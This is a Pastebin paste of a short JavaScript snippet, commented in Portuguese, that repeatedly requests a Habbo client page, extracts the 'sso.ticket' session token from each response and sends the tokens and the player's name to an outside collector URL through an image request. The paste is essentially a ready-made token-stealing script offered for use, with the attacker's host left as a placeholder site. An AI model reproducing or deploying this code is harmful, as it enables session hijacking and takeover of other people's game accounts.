Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- sso_num = 100; //número de sso's que você quer
- for (i = 0; i <= sso_num; i++) {
- new Ajax.Request(/client/, {
- onComplete: function (x) {
- sso = x.responseText.match(/"sso.ticket" : "(.+)"/)[0].split('"')[3];
- new Image().src = 'http://seusite.com/ctk.php?sso=' + sso + '&habbo=' + habboName;
- }
- });
- };
Advertisement
Add Comment
Please, Sign In to add comment